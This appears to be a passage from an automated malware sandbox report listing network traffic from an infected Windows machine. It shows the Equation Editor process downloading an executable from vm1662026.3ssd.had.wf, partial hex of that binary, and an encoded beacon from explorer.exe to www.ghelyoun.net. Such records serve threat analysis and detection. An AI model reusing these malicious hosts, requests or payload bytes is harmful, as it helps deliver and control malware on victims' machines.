Jan 13, 2021 20:37:15.132859945 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132894039 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132899046 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.132941008 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.132946014 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133025885 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133032084 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133066893 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133066893 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133111000 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133112907 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133156061 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133157015 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133198977 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133445024 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133735895 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133776903 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133786917 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133819103 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.133845091 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.133886099 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.135590076 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.135636091 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.135653973 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.135670900 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.135682106 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.135721922 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.135730982 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.135757923 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136014938 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136055946 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136063099 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136096001 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136106014 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136132002 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136146069 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136192083 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136195898 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136241913 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136245012 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136301041 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136344910 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136352062 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136358023 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136393070 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136403084 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136431932 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136454105 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136466026 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136471987 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136512041 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136514902 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136548042 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136563063 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136611938 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136612892 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136662006 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136663914 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136702061 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136718035 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136740923 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136743069 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136781931 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136791945 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136826038 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136831999 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136842012 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136868000 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136872053 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136912107 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136919975 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.136960983 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.136965036 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137006998 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137017965 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137059927 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137061119 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137088060 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137103081 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137124062 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137145996 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137187004 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137192965 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137232065 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137233019 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137273073 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137298107 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.137341022 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.137516975 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.183783054 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183825970 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183839083 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183856010 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183870077 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183886051 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183903933 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183923960 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183943033 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183943987 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.183959961 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183967113 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.183981895 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.183985949 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.183990955 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184005022 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184021950 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184024096 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184041977 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184046984 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184057951 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184072018 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184083939 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184098005 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184109926 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184123993 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184139967 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184149027 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184165955 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184173107 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184185982 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184195995 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184205055 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184217930 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184242010 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184242964 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184258938 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184267998 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184272051 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184293032 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184309006 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184319973 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184336901 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184345007 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184353113 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184370995 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184391022 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184393883 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184405088 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184423923 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184432983 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184451103 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184463978 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184475899 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184490919 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184501886 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184509039 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184526920 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184539080 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184551954 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184566021 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184576988 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.184586048 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.184614897 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.189449072 CET	80	49165	92.119.114.220	192.168.2.22
Jan 13, 2021 20:37:15.189543962 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:37:15.613908052 CET	49165	80	192.168.2.22	92.119.114.220
Jan 13, 2021 20:38:29.743196964 CET	49166	80	192.168.2.22	91.195.240.94
Jan 13, 2021 20:38:29.788032055 CET	80	49166	91.195.240.94	192.168.2.22
Jan 13, 2021 20:38:29.788126945 CET	49166	80	192.168.2.22	91.195.240.94
Jan 13, 2021 20:38:29.788322926 CET	49166	80	192.168.2.22	91.195.240.94
Jan 13, 2021 20:38:29.832936049 CET	80	49166	91.195.240.94	192.168.2.22
Jan 13, 2021 20:38:29.845252991 CET	80	49166	91.195.240.94	192.168.2.22
Jan 13, 2021 20:38:29.845284939 CET	80	49166	91.195.240.94	192.168.2.22
Jan 13, 2021 20:38:29.845561028 CET	49166	80	192.168.2.22	91.195.240.94
Jan 13, 2021 20:38:29.845624924 CET	49166	80	192.168.2.22	91.195.240.94
Jan 13, 2021 20:38:29.890786886 CET	80	49166	91.195.240.94	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 13, 2021 20:37:14.687720060 CET	52197	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:37:14.749825001 CET	53	52197	8.8.8.8	192.168.2.22
Jan 13, 2021 20:38:29.660865068 CET	53099	53	192.168.2.22	8.8.8.8
Jan 13, 2021 20:38:29.733834982 CET	53	53099	8.8.8.8	192.168.2.22
Jan 13, 2021 20:39:23.412831068 CET	52838	53	192.168.2.22	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 13, 2021 20:37:14.687720060 CET	192.168.2.22	8.8.8.8	0xd92d	Standard query (0)	vm1662026.3ssd.had.wf	A (IP address)	IN (0x0001)
Jan 13, 2021 20:38:29.660865068 CET	192.168.2.22	8.8.8.8	0xa14d	Standard query (0)	www.ghelyoun.net	A (IP address)	IN (0x0001)
Jan 13, 2021 20:39:23.412831068 CET	192.168.2.22	8.8.8.8	0xccff	Standard query (0)	www.aboutwheelchair.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 13, 2021 20:37:14.749825001 CET	8.8.8.8	192.168.2.22	0xd92d	No error (0)	vm1662026.3ssd.had.wf		92.119.114.220	A (IP address)	IN (0x0001)
Jan 13, 2021 20:38:29.733834982 CET	8.8.8.8	192.168.2.22	0xa14d	No error (0)	www.ghelyoun.net		91.195.240.94	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

vm1662026.3ssd.had.wf

www.ghelyoun.net

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	92.119.114.220	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:37:14.817434072 CET	0	OUT	GET /mpomabiva.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: vm1662026.3ssd.had.wf Connection: Keep-Alive
Jan 13, 2021 20:37:14.870426893 CET	2	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 13 Jan 2021 19:37:14 GMT Content-Type: application/octet-stream Content-Length: 333824 Last-Modified: Wed, 13 Jan 2021 12:17:39 GMT Connection: keep-alive Keep-Alive: timeout=60 ETag: "5ffee4e3-51800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2e 90 03 74 6a f1 6d 27 6a f1 6d 27 6a f1 6d 27 f4 51 aa 27 6b f1 6d 27 ae 34 a2 27 49 f1 6d 27 ae 34 a0 27 72 f1 6d 27 ae 34 a3 27 e2 f1 6d 27 6a f1 6c 27 1e f1 6d 27 96 86 d4 27 7f f1 6d 27 4d 37 a3 27 6b f1 6d 27 4d 37 a4 27 6b f1 6d 27 4d 37 a1 27 6b f1 6d 27 52 69 63 68 6a f1 6d 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 45 ce fe 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 6e 01 00 00 ec 00 00 00 00 00 00 a7 88 00 00 00 10 00 00 00 80 01 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 02 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 94 db 01 00 dc 00 00 00 00 50 02 00 78 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 00 50 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 d6 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 c8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9a 6d 01 00 00 10 00 00 00 6e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 f8 64 00 00 00 80 01 00 00 66 00 00 00 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 50 00 00 00 f0 01 00 00 34 00 00 00 d8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 1a 00 00 00 50 02 00 00 1c 00 00 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 98 17 00 00 00 70 02 00 00 18 00 00 00 28 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$.tjm'jm'jm'Q'km'4'Im'4'rm'4'm'jl'm''m'M7'km'M7'km'M7'km'Richjm'PELE_n@@PxpP@.textmn `.rdatadfr@@.dataP4@.rsrcxP@@.relocp(@B
Jan 13, 2021 20:37:14.870512009 CET	3	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec b8 1c 1e 00 00 e8 23 77 00 00 68 68 fa 41 00 ff 15 40 80 41 00 89 45 f4 e8 20 5b 00 00 68 d9 c5 16 b6 8b 45 f4 50 e8 02 5a 00 00 89 45 d8 68 99 aa 0b 0e 8b 4d f4 Data Ascii: U#whhA@AE [hEPZEhMQYEhr#hA<APYEhx\ihA<APYEhGURYEjhAjUEEPjUEhMQRiEEE}M
Jan 13, 2021 20:37:14.870580912 CET	4	IN	Data Raw: 8b ec 51 8b 45 08 50 e8 53 6d 00 00 83 c4 04 83 e8 01 89 45 fc 8b 4d 08 03 4d fc 0f be 11 83 fa 39 74 16 8b 45 08 03 45 fc 0f be 08 83 c1 01 8b 55 08 03 55 fc 88 0a eb 09 8b 45 08 03 45 fc c6 00 30 8b 4d fc 83 e9 01 89 4d fc 8b 55 08 03 55 fc 0f Data Ascii: QEPSmEMM9tEEUUEE0MMUUB0t]UkkUDELkkMTUDkE
Jan 13, 2021 20:37:14.870647907 CET	6	IN	Data Raw: 0f 10 4d 0c f3 0f 5c c8 f3 0f 59 0d 30 82 41 00 f3 0f 2c c9 89 4d f4 8b 45 f4 99 b9 0a 00 00 00 f7 f9 83 c0 30 8b 55 08 03 55 fc 88 02 8b 45 fc 83 c0 01 89 45 fc 8b 45 f4 99 b9 0a 00 00 00 f7 f9 83 c2 30 8b 45 08 03 45 fc 88 10 8b 4d fc 83 c1 01 Data Ascii: M\Y0A,ME0UUEEE0EEMMUUE.ADzEPMQ(f]U<E3EEEEfEEE3MMM\j1j]R(l,EEE
Jan 13, 2021 20:37:14.870712042 CET	7	IN	Data Raw: 75 09 8b 4d fc 83 e9 01 89 4d fc e9 ae 00 00 00 83 7d f8 1f 7e 09 8b 55 fc 83 c2 01 89 55 fc e9 9a 00 00 00 83 7d f8 1e 7e 09 8b 45 fc 83 c0 01 89 45 fc e9 86 00 00 00 83 7d f8 1f 7e 09 8b 4d fc 83 c1 01 89 4d fc eb 75 83 7d f8 1e 7e 09 8b 55 fc Data Ascii: uMM}~UU}~EE}~MMu}~UUd}~EES}~MMB}~UU1}~EE }~MM}~UU}u3]@@@@ @ @/ @
Jan 13, 2021 20:37:14.870778084 CET	9	IN	Data Raw: a8 25 40 00 e8 a8 00 00 00 eb 7c e8 e1 02 00 00 eb 75 e8 ea 05 00 00 eb 6e e8 53 09 00 00 eb 67 e8 ac fb ff ff 6a 0a 6a 0f e8 73 ed ff ff 68 20 f3 41 00 e8 15 4c 00 00 83 c4 04 0f be 55 ff 83 fa 59 74 09 0f be 45 ff 83 f8 79 75 07 6a 00 e8 4e 52 Data Ascii: %@\|unSgjjsh ALUYtEyujNR1vjj=hHAKjj'hAK]%@%@!%@(%@/%@UEEE3EEEEEEEEE3MM
Jan 13, 2021 20:37:14.870841980 CET	10	IN	Data Raw: ff 52 8d 85 48 ff ff ff 50 68 c4 f5 41 00 8b 0d 28 2f 42 00 51 e8 be 45 00 00 83 c4 18 83 f8 ff 74 64 8d 95 48 ff ff ff 52 e8 7b 52 01 00 83 c4 04 8d 45 f0 50 e8 6f 52 01 00 83 c4 04 8d 4d f0 51 8d 95 48 ff ff ff 52 e8 9a 57 00 00 83 c4 08 85 c0 Data Ascii: RHPhA(/BQEtdHR{REPoRMQHRWt-EPyQjRHPhA /BQ?Dj(/BRB /BPBjjhAXF]UE3EEEEEEEEE3
Jan 13, 2021 20:37:14.870914936 CET	12	IN	Data Raw: 52 8d 45 a8 50 8d 4d c8 51 68 e0 f7 41 00 8b 15 28 2f 42 00 52 e8 84 40 00 00 83 c4 14 83 f8 ff 74 25 8d 45 c8 50 8b 4d f8 6b c9 45 03 4d e8 51 e8 78 52 00 00 83 c4 08 85 c0 75 09 8b 55 f8 83 c2 01 89 55 f8 eb b6 a1 28 2f 42 00 50 e8 e1 3d 00 00 Data Ascii: REPMQhA(/BR@t%EPMkEMQxRuUU(/BP=?MM /BR=jjhARAjjhA<AjjhA&Ajjnh0AAjjXEEE}N}hHA
Jan 13, 2021 20:37:14.870981932 CET	13	IN	Data Raw: f8 6b c0 45 03 45 f0 b9 01 00 00 00 6b c9 05 c6 44 08 31 00 8b 55 f8 6b d2 45 03 55 f0 b8 01 00 00 00 6b c0 05 c6 44 02 3b 00 8b 4d f8 6b c9 45 8b 55 f0 8d 44 0a 22 50 e8 c6 4d 00 00 83 c4 04 83 f8 0a 73 13 8b 4d f8 6b c9 45 8b 55 f0 8d 44 0a 22 Data Ascii: kEEkD1UkEUkD;MkEUD"PMsMkEUD"PMQjUkEEL;QUkEEL1QUkEEL"QUkEELQhA;U9U\|EEMStUsuEE uM;MuE
Jan 13, 2021 20:37:14.871046066 CET	14	IN	Data Raw: 00 e8 f4 34 00 00 83 c4 08 a3 28 2f 42 00 8d 55 e0 52 8d 45 b4 50 68 40 2f 42 00 68 e0 2e 42 00 68 78 fd 41 00 8b 0d 28 2f 42 00 51 e8 de 34 00 00 83 c4 18 8b 15 28 2f 42 00 52 e8 7f 33 00 00 83 c4 04 6a 00 e8 70 3d 00 00 eb 31 e8 98 e6 ff ff 6a Data Ascii: 4(/BUREPh@/Bh.BhxA(/BQ4(/BR3jp=1jj_hA7jjIhA6K]I8@8@8@9@9@9@'9@9@Uh Bh$B)4(/B=(/Bh0Bh4B4
Jan 13, 2021 20:37:14.922678947 CET	16	IN	Data Raw: 09 0f be 44 15 83 8d 4c 01 d0 89 4d ec ba 01 00 00 00 6b d2 06 0f be 82 40 2f 42 00 83 e8 30 6b c0 0a b9 01 00 00 00 6b c9 07 0f be 91 40 2f 42 00 8d 84 10 a0 07 00 00 89 45 e4 8d 4d 83 51 e8 eb de ff ff 85 c0 74 08 8b 55 ec 3b 55 e4 7e 1a 68 74 Data Ascii: DLMk@/B0kk@/BEMQtU;U~htA1jj<jjeEPM;Mh@/BCURjjhxA{1EPhA3EMMURB9EsEL u

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.22	49166	91.195.240.94	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:38:29.788322926 CET	352	OUT	GET /iic6/?Cr24w=dZrXWrr0J06LhDJ&UL0tljxP=LfZLOLN5XSNEI+sCgvR59RXQ9jmNrQ0h0keI8mxtmC8z/BE1pdL/TKWDQE351dcf8yE5vQ== HTTP/1.1 Host: www.ghelyoun.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:38:29.845252991 CET	353	IN	HTTP/1.1 301 Moved Permanently content-type: text/html; charset=utf-8 location: https://www.ghelyoun.net/iic6/?Cr24w=dZrXWrr0J06LhDJ&UL0tljxP=LfZLOLN5XSNEI+sCgvR59RXQ9jmNrQ0h0keI8mxtmC8z/BE1pdL/TKWDQE351dcf8yE5vQ== date: Wed, 13 Jan 2021 19:38:29 GMT content-length: 173 connection: close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 68 65 6c 79 6f 75 6e 2e 6e 65 74 2f 69 69 63 36 2f 3f 43 72 32 34 77 3d 64 5a 72 58 57 72 72 30 4a 30 36 4c 68 44 4a 26 61 6d 70 3b 55 4c 30 74 6c 6a 78 50 3d 4c 66 5a 4c 4f 4c 4e 35 58 53 4e 45 49 2b 73 43 67 76 52 35 39 52 58 51 39 6a 6d 4e 72 51 30 68 30 6b 65 49 38 6d 78 74 6d 43 38 7a 2f 42 45 31 70 64 4c 2f 54 4b 57 44 51 45 33 35 31 64 63 66 38 79 45 35 76 51 3d 3d 22 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 61 3e 2e 0a 0a Data Ascii: <a 